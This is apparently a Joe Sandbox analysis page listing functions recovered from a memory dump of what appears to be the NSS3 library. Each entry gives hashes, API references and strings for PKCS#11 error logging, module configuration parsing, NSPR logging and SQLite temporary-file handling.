Instruction ID: 58b85dc827152198983c79aeff18fba34e4628b94b39fe76f70b2c9edf14383d
Opcode Fuzzy Hash: dd9ec95fb077661ea4472aaed4fe7920b4a2ca8ef7c0bef4b95949521523992a
Instruction Fuzzy Hash: 8DA12D71A0021A9FDF18CF9EC894AEEB7F6BF89350F248529E915A7700D735AC51CB90

Function 6D4F8EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaa04f033772f45f44fb768ffc3812c5fca1e51646fe94412f4a8d9a48cba7a3
Instruction ID: 67551e2961a6edf04289857db02511fb59f09ce6ec07942dde7aa96c7c2bcd62
Opcode Fuzzy Hash: eaa04f033772f45f44fb768ffc3812c5fca1e51646fe94412f4a8d9a48cba7a3
Instruction Fuzzy Hash: BC11BFB2A042168FD708DF26D884B6AB3A5FF82318F148269D8058F762C775EC83C7D1

Function 6D5D0C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df15b7900b5e4f78aa67f8f5e54366ff676dbc7961a5186e1b5d23fd7da3bc11
Instruction ID: e485127044e24aeeb9e8742f3c0f92b489027a6976b9b1e7b2b7f639b9c2c426
Opcode Fuzzy Hash: df15b7900b5e4f78aa67f8f5e54366ff676dbc7961a5186e1b5d23fd7da3bc11
Instruction Fuzzy Hash: B211C1346043068FCB44DF1DC88466AB7A1FF85364F14846ED8198B752DB71E806CBA5

Function 6D543FF0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Error
String ID:
API String ID: 2275178025-0
Opcode ID: a2a136cb4e1d9587f77f2d85fed1c331ad619797b7203407563945a1a94458a8
Instruction ID: b0bd3a1b200c61f77a1ac3f7f88f8079645fa442438aec8b716cc7af782bfae9
Opcode Fuzzy Hash: a2a136cb4e1d9587f77f2d85fed1c331ad619797b7203407563945a1a94458a8
Instruction Fuzzy Hash: DAF05E70A047598BCB14DF69C45169AB7F4EF49254F019619ED8AAB201EB30AAD4C7C2

Function 6D5D0D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 1d717b5d1ce8c21a816b553445478802f2a21b35e745c382ed0eda39cf399019
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 0BE06D3A200015A7DF989E0ED450AA97359EF81615FA4887BEC5A9BA01D633F80387A5

Function 6D531D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6D531D46), ref: 6D532345

Strings

CKR_DEVICE_ERROR, xrefs: 6D53229D
rv = %s, xrefs: 6D532340
CKR_OPERATION_CANCEL_FAILED, xrefs: 6D531F77
CKR_OBJECT_HANDLE_INVALID, xrefs: 6D53204D
CKR_PIN_INCORRECT, xrefs: 6D531D92
CKR_FUNCTION_REJECTED, xrefs: 6D532289
CKR_CURVE_NOT_SUPPORTED, xrefs: 6D532179
CKR_OPERATION_NOT_INITIALIZED, xrefs: 6D531FD7
CKR_WRAPPING_KEY_SIZE_RANGE, xrefs: 6D532327
rv = 0x%x, xrefs: 6D532312
CKR_TOKEN_NOT_RECOGNIZED, xrefs: 6D531F8B
CKR_FUNCTION_CANCELED, xrefs: 6D531E73
CKR_TEMPLATE_INCOMPLETE, xrefs: 6D531F95
CKR_PIN_EXPIRED, xrefs: 6D53206B
CKR_TOKEN_NOT_PRESENT, xrefs: 6D531F81
CKR_OPERATION_ACTIVE, xrefs: 6D5322B8
CKR_TOKEN_WRITE_PROTECTED, xrefs: 6D531DE0
CKR_TOKEN_RESOURCE_EXCEEDED, xrefs: 6D532293, 6D53233F
CKR_STATE_UNSAVEABLE, xrefs: 6D532037
CKR_PIN_LOCKED, xrefs: 6D532075
CKR_BUFFER_TOO_SMALL, xrefs: 6D532183
CKR_INFORMATION_SENSITIVE, xrefs: 6D5322B1
CKR_SAVED_STATE_INVALID, xrefs: 6D531E56
CKR_WRAPPING_KEY_HANDLE_INVALID, xrefs: 6D532320
CKR_DOMAIN_PARAMS_INVALID, xrefs: 6D532015
CKR_ENCRYPTED_DATA_LEN_RANGE, xrefs: 6D531F0F
CKR_DEVICE_REMOVED, xrefs: 6D532261
CKR_NEXT_OTP, xrefs: 6D53222F
CKR_CRYPTOKI_ALREADY_INITIALIZED, xrefs: 6D53227F
CKR_MUTEX_BAD, xrefs: 6D531F49
CKR_WRAPPING_KEY_TYPE_INCONSISTENT, xrefs: 6D53232E
CKR_RANDOM_NO_RNG, xrefs: 6D5322A7
CKR_DEVICE_MEMORY, xrefs: 6D531FF3
CKR_MUTEX_NOT_LOCKED, xrefs: 6D532225
CKR_CRYPTOKI_NOT_INITIALIZED, xrefs: 6D532275
CKR_SIGNATURE_INVALID, xrefs: 6D5320CF
CKR_TEMPLATE_INCONSISTENT, xrefs: 6D531EE1
CKR_NEW_PIN_MODE, xrefs: 6D531E9F
CKR_PIN_INVALID, xrefs: 6D532057
CKR_OK, xrefs: 6D531DFC
CKR_SIGNATURE_LEN_RANGE, xrefs: 6D5320D9
CKR_WRAPPED_KEY_INVALID, xrefs: 6D531FB5
CKR_WRAPPED_KEY_LEN_RANGE, xrefs: 6D532319
CKR_ENCRYPTED_DATA_INVALID, xrefs: 6D53226B
CKR_RANDOM_SEED_NOT_SUPPORTED, xrefs: 6D5322FF
CKR_FUNCTION_NOT_PARALLEL, xrefs: 6D53218D
CKR_PIN_LEN_RANGE, xrefs: 6D532061

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Print
String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
API String ID: 3558298466-1980531169
Opcode ID: 41620a759f2a76f51f123bc8b75d60a41f6739a6b1ec24b077667487bd1f912d
Instruction ID: 6e428038215c2629fe76d2f05952da44400a140cdf412fd7694297f6c9b15ad9
Opcode Fuzzy Hash: 41620a759f2a76f51f123bc8b75d60a41f6739a6b1ec24b077667487bd1f912d
Instruction Fuzzy Hash: C761D13059D871C6DB3E889C85A477C2324BB0B391F96CC37E6828EE59F6958A4146D3

Function 6D565DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6D565E08
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D565E3F
PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6D565E5C
free.MOZGLUE(00000000), ref: 6D565E7E
free.MOZGLUE(00000000), ref: 6D565E97
PORT_Strdup_Util.NSS3(secmod.db), ref: 6D565EA5
_NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6D565EBB
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D565ECB
PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6D565EF0
free.MOZGLUE(00000000), ref: 6D565F12
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D565F35
PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6D565F5B
free.MOZGLUE(00000000), ref: 6D565F82
PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6D565FA3
PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6D565FB7
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6D565FC4
free.MOZGLUE(00000000), ref: 6D565FDB
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6D565FE9
free.MOZGLUE(00000000), ref: 6D565FFE
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6D56600C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D566027
PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6D56605A
PR_smprintf.NSS3(6D63AAF9,00000000), ref: 6D56606A
free.MOZGLUE(00000000), ref: 6D56607C
free.MOZGLUE(00000000), ref: 6D56609A
free.MOZGLUE(00000000), ref: 6D5660B2
free.MOZGLUE(?), ref: 6D5660CE

Strings

configDir=, xrefs: 6D565F9D
noModDB, xrefs: 6D565EEA
flags, xrefs: 6D565E3A, 6D565EC6, 6D565F30
%s/%s, xrefs: 6D566055
readOnly, xrefs: 6D565E56
secmod=, xrefs: 6D565FB1
pkcs11.txt, xrefs: 6D565F47, 6D565F7C, 6D56603A, 6D566053
secmod.db, xrefs: 6D565EA0
forceSecmodChoice, xrefs: 6D565F55

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
API String ID: 1427204090-154007103
Opcode ID: dcc24c6e3de6f1c49545fd35fec2df92abe01f8f392c25836ce3a16499bc85de
Instruction ID: ba1cdd40f05757a6c2388d5e6651ed731233ca3570c157d77ad577701b416718
Opcode Fuzzy Hash: dcc24c6e3de6f1c49545fd35fec2df92abe01f8f392c25836ce3a16499bc85de
Instruction Fuzzy Hash: B19104F09442825BEF05CF34DC81B7B3BA4AF4A359F0904A4EC559BA53E722D950CBB2

Function 6D6109D0 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 275filetimethreadCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6D610A22

Part of subcall function 6D5C9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D610A27), ref: 6D5C9DC6
Part of subcall function 6D5C9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D610A27), ref: 6D5C9DD1
Part of subcall function 6D5C9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D5C9DED

PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D610A35

Part of subcall function 6D4F3810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D4F382A
Part of subcall function 6D4F3810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D4F3879

PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D610A66
PR_GetCurrentThread.NSS3 ref: 6D610A70
PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D610A9D
PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D610AC8
PR_vsmprintf.NSS3(?,?), ref: 6D610AE8
EnterCriticalSection.KERNEL32(?), ref: 6D610B19
OutputDebugStringA.KERNEL32(00000000), ref: 6D610B48
OutputDebugStringA.KERNEL32(?), ref: 6D610B88
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6D610C36
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D610C45
memcpy.VCRUNTIME140(?,?,00000000), ref: 6D610C5D
_PR_MD_UNLOCK.NSS3(?), ref: 6D610C76
PR_LogFlush.NSS3 ref: 6D610C7E
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6D610C8D
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D610C9C
OutputDebugStringA.KERNEL32(?), ref: 6D610CD1
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D610CEC
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D610CFB
OutputDebugStringA.KERNEL32(00000000), ref: 6D610D16
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6D610D26
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D610D35
OutputDebugStringA.KERNEL32(0000000A), ref: 6D610D65
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6D610D70
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D610D7E
_PR_MD_UNLOCK.NSS3(?), ref: 6D610D90
free.MOZGLUE(00000000), ref: 6D610D99

Strings

%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - , xrefs: 6D610A5B
%ld[%p]: , xrefs: 6D610A96

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: DebugOutputStringfflush$Timefwrite$Unothrow_t@std@@@__ehfuncinfo$??2@$R_snprintfSystem$CriticalCurrentEnterExplodeFileFlushR_vsmprintfR_vsnprintfSectionThreadfputcfreememcpy
String ID: %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - $%ld[%p]:
API String ID: 3820836880-2800039365
Opcode ID: 8701c2eeca9a7920b97100f23e327ca3bf62a44f97d88fa38b53d87e331acd30
Instruction ID: 6b5d712da401e98933c97d6c79bcb80ed2a8ea1f687338de01ee94545212c506
Opcode Fuzzy Hash: 8701c2eeca9a7920b97100f23e327ca3bf62a44f97d88fa38b53d87e331acd30
Instruction Fuzzy Hash: 2DA129749482449FDF10DB3ACC48FBA3B78EF5A318F080658F91AD3252D775A9A4CB52

Function 6D4F1D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6D4F1DA3

Part of subcall function 6D5C98D0: calloc.MOZGLUE(00000001,00000084,6D4F0936,00000001,?,6D4F102C), ref: 6D5C98E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6D4F1DB2

Part of subcall function 6D4F1240: TlsGetValue.KERNEL32(00000040,?,6D4F116C,NSPR_LOG_MODULES), ref: 6D4F1267
Part of subcall function 6D4F1240: EnterCriticalSection.KERNEL32(?,?,?,6D4F116C,NSPR_LOG_MODULES), ref: 6D4F127C
Part of subcall function 6D4F1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6D4F116C,NSPR_LOG_MODULES), ref: 6D4F1291
Part of subcall function 6D4F1240: PR_Unlock.NSS3(?,?,?,?,6D4F116C,NSPR_LOG_MODULES), ref: 6D4F12A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D4F1DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6D4F1E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6D4F1EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6D4F1ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6D4F1EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6D4F1F17
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D4F1F34
PR_SetLogBuffering.NSS3(00004000), ref: 6D4F1F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6D4F1F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6D4F1F83
PR_SetLogFile.NSS3(00000000), ref: 6D4F1FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6D4F1FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6D4F1FCB
free.MOZGLUE(00000000), ref: 6D4F1FD2

Strings

append, xrefs: 6D4F1EE6
timestamp, xrefs: 6D4F1EC4
sync, xrefs: 6D4F1E46
NSPR_LOG_MODULES, xrefs: 6D4F1DAD
NSPR_LOG_FILE, xrefs: 6D4F1F69
, %n, xrefs: 6D4F1E6B
Unable to create nspr log file '%s', xrefs: 6D4F1FB3
all, xrefs: 6D4F1F0E
%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6D4F1E27
bufsize, xrefs: 6D4F1E9B

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: 2cf3714f2bdbbdf8153b4382718aa13c106709556a318feb0017adedc2b3ba0d
Instruction ID: 0bed10c79322bd6b6c992d21d143bcd521cfedee77b361cef32135f57dc7a360
Opcode Fuzzy Hash: 2cf3714f2bdbbdf8153b4382718aa13c106709556a318feb0017adedc2b3ba0d
Instruction Fuzzy Hash: 1D51BDB1D0425A9BDF00CBE5CC48FAE77B8AF45308F054128E91ADB211E775ED5ACBA1

Function 6D5D6E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6D48CA30: EnterCriticalSection.KERNEL32(?,?,?,6D4EF9C9,?,6D4EF4DA,6D4EF9C9,?,?,6D4B369A), ref: 6D48CA7A
Part of subcall function 6D48CA30: LeaveCriticalSection.KERNEL32(?), ref: 6D48CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6D49BE66), ref: 6D5D6E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6D49BE66), ref: 6D5D6E98
sqlite3_snprintf.NSS3(?,00000000,6D63AAF9,?,?,?,?,?,?,6D49BE66), ref: 6D5D6EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6D49BE66), ref: 6D5D6ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6D49BE66), ref: 6D5D6EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6D49BE66), ref: 6D5D6F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6D49BE66), ref: 6D5D6F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6D49BE66), ref: 6D5D6F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6D49BE66), ref: 6D5D6FA6
sqlite3_snprintf.NSS3(?,00000000,6D63AAF9,00000000,?,?,?,?,?,?,?,6D49BE66), ref: 6D5D6FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6D49BE66), ref: 6D5D6FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6D49BE66), ref: 6D5D6FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6D49BE66), ref: 6D5D7014
sqlite3_free.NSS3(00000000,?,?,?,?,6D49BE66), ref: 6D5D701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6D49BE66), ref: 6D5D7030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6D49BE66), ref: 6D5D705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6D49BE66), ref: 6D5D7079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6D49BE66), ref: 6D5D7097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6D49BE66), ref: 6D5D70A0

Strings

winGetTempname4, xrefs: 6D5D7046
winGetTempname5, xrefs: 6D5D7071
winGetTempname2, xrefs: 6D5D70C4
mz_etilqs_, xrefs: 6D5D6F18
Pam, xrefs: 6D5D70A8
winGetTempname1, xrefs: 6D5D708F

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: Pam$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-3112917483
Opcode ID: 89d25355ea8d81b7d95cfef318e2b2f645e8f55580930f0617a8e4c320aa7e54
Instruction ID: 5071af86ad6a1ae14a59844ac352a5090b3d0848b1aceff1bc301ec770d56746
Opcode Fuzzy Hash: 89d25355ea8d81b7d95cfef318e2b2f645e8f55580930f0617a8e4c320aa7e54
